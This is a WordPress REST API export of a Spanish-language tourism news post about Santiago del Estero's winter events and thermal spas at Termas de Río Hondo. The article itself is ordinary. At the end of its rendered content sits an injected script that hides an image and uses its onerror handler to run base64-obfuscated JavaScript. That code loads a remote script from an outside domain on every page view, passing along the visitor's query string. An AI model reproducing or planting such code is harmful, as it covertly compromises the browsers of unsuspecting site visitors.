{"id":5234,"date":"2022-05-05T11:15:55","date_gmt":"2022-05-05T14:15:55","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5234"},"modified":"2025-08-13T16:20:32","modified_gmt":"2025-08-13T19:20:32","slug":"deportes-arte-y-turismo-de-bienestar-opciones-de-santiago-del-estero-para-el-invierno","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5234","title":{"rendered":"Deportes, arte y turismo de bienestar, opciones de Santiago del Estero para el invierno"},"content":{"rendered":"\n<h4 class=\"has-pale-cyan-blue-background-color has-background wp-block-heading\">El subsecretario de Turismo, Nelson Bravo. anticip\u00f3 que por la fecha de Turismo Carretera del fin de semana, las reservas hoteleras est\u00e1n pr\u00e1cticamente completas. Tambi\u00e9n asegur\u00f3 que las Termas de R\u00edo Hondo \u00abestar\u00e1n a pleno\u00bb.<\/h4>\n\n\n\n<p>El&nbsp;<strong>subsecretario de Turismo de Santiago del Estero, Nelson Bravo<\/strong>, destac\u00f3 este mi\u00e9rcoles la agenda de actividades que prepar\u00f3 la provincia para la temporada de invierno, que incluye citas deportivas de nivel internacional, \u00abcomo la presentaci\u00f3n de Los Pumas y la Copa Mundial de Taekwondo\u00bb, propuestas art\u00edsticas y el desarrollo del turismo termal que se proyecta con \u201caltas expectativas\u201d.<\/p>\n\n\n\n<p>\u201cEste fin de semana tendremos la<strong>&nbsp;presencia del Turismo Carretera en nuestro aut\u00f3dromo<\/strong>, que es un evento muy convocante, con lo cual a esta altura tenemos una reserva hotelera en porcentajes bastante altos y apuntando tambi\u00e9n lo que va a ser un fin de semana pr\u00e1cticamente a pleno en la&nbsp;<strong>ciudad de Termas de R\u00edo Hondo<\/strong>\u201d, se\u00f1al\u00f3 Bravo en di\u00e1logo con T\u00e9lam Radio.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-soundcloud wp-block-embed-soundcloud\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Santiago del Estero con temporada art\u00edstica, cultural, termal y deportiva que reactiva la econom\u00eda by Audio\" width=\"640\" height=\"400\" scrolling=\"no\" frameborder=\"no\" src=\"https:\/\/w.soundcloud.com\/player\/?visual=true&#038;url=https%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F1262096572&#038;show_artwork=true&#038;maxheight=960&#038;maxwidth=640\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>El subsecretario indic\u00f3 que la semana siguiente ser\u00e1 \u201cla<strong>&nbsp;apertura oficial de temporada con artistas de nivel internacional&nbsp;<\/strong>como Mora Godoy, Miguel Mateos, y Rusherking, un santiague\u00f1o que hace trap y que est\u00e1 alcanzando un \u00e9xito m\u00e1s que interesante\u201d.<\/p>\n\n\n\n<p>\u201cPosteriormente tendremos el&nbsp;<strong>Foro Nacional de Turismo<\/strong>, el fin de semana largo tambi\u00e9n, que seguramente m\u00e1s all\u00e1 de la propuesta que tiene siempre Termas de R\u00edo Hondo de relax, de sus aguas curativas, de sus SPA internacionalmente conocidos, sumar\u00e1 actividades culturales y gastron\u00f3micas aportadas desde el Estado y el sector privado\u201d, ampli\u00f3.<\/p>\n\n\n\n<p>Tambi\u00e9n comparti\u00f3 que para julio, \u00abque es la temporada fuerte en la provincia\u00bb, se tendr\u00e1 \u201cla&nbsp;<strong>presencia de Los Pumas que van a enfrentar a su par de Escocia<\/strong>\u201d, y asimismo se contar\u00e1 con \u201cla&nbsp;<strong>Copa Mundial de Taekwondo en septiembre<\/strong>\u201d.<\/p>\n\n\n\n<p>Por otra parte, el funcionario provincial adelant\u00f3 que se est\u00e1 trabajando \u00abpara que antes de fin de a\u00f1o tengamos una fecha de la Hockey Legue, con la presencia de seleccionados de nivel internacional que jugar\u00edan en unas canchas que estamos pr\u00f3ximos a inaugurar: una de arena y otra de agua\u201d.<\/p>\n\n\n\n<p>Bravo remarc\u00f3 que todo este despliegue \u201cno es casualidad, es una pol\u00edtica de Estado del turismo que el gobernador Gerardo Zamora hace poco dijo p\u00fablicamente que la alianza estrat\u00e9gica entre el turismo, el deporte y la cultura, genera un nicho de desarrollo m\u00e1s que importante\u201d.<\/p>\n\n\n\n<p>Bravo dijo que esa pol\u00edtica se traduce en el afincamiento de nuevos hoteles, y el incremento de la actividad de servicios de los que ya estaban instalados que \u00abya han tomado m\u00e1s empleados\u00bb.<\/p>\n\n\n\n<p>\u201cSe genera empleo genuino y una actividad econ\u00f3mica muy importante a partir de los dividendos que dejan tanto los turistas nacionales como los internacionales\u201d, apunt\u00f3.<\/p>\n\n\n\n<p>En ese sentido, el subsecretario de Turismo provincial se\u00f1al\u00f3 que \u00abhemos tenido visitantes de Brasil de manera permanente, y tambi\u00e9n desde Chile, que se est\u00e1 abriendo un poco m\u00e1s desde ahora, y desde Bolivia\u00bb.<\/p>\n\n\n\n<p>En cuanto a la evoluci\u00f3n del&nbsp;<strong>Turismo de Bienestar<\/strong>, Bravo record\u00f3 que \u00abantes Termas eran visitadas \u00fanicamente por personas que padec\u00edan alguna enfermedad por las caracter\u00edsticas de sus aguas curativas, o turistas de la tercera edad para aplacar sus dolencias\u00bb.<\/p>\n\n\n\n<p>\u00abHoy&nbsp;<strong>Termas -continu\u00f3-, m\u00e1s all\u00e1 del turismo saludable, es tambi\u00e9n un turismo vinculado al bienestar que producen las aguas, de relax, y con eso se va ampliando el nicho del mercado<\/strong>, porque no abarca \u00fanicamente una poblaci\u00f3n de determinado rango de edad, sino que se va ampliando, y con toda la oferta que tiene a nivel de infraestructura, y tambi\u00e9n a nivel de eventos que se vienen haciendo, va creciendo el espectro, no solo en edad, si no tambi\u00e9n en apertura a nivel internacional\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202205\/591472-deportes-arte-turismo-bienestar-santiago-del-estero-invierno.html\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1.jpeg\" alt=\"\" class=\"wp-image-5235\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1.jpeg 964w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-768x76.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El subsecretario de Turismo, Nelson Bravo. anticip\u00f3 que por la fecha de Turismo Carretera del fin de semana, las reservas hoteleras est\u00e1n pr\u00e1cticamente completas. Tambi\u00e9n asegur\u00f3 que las Termas de R\u00edo Hondo \u00abestar\u00e1n a pleno\u00bb. El&nbsp;subsecretario de Turismo de Santiago del Estero, Nelson Bravo, destac\u00f3 este mi\u00e9rcoles la agenda de actividades que prepar\u00f3 la provincia [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5236,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,15],"tags":[],"class_list":["post-5234","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-turismo-de-bienestar"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5234"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5234\/revisions"}],"predecessor-version":[{"id":10682,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5234\/revisions\/10682"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5236"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}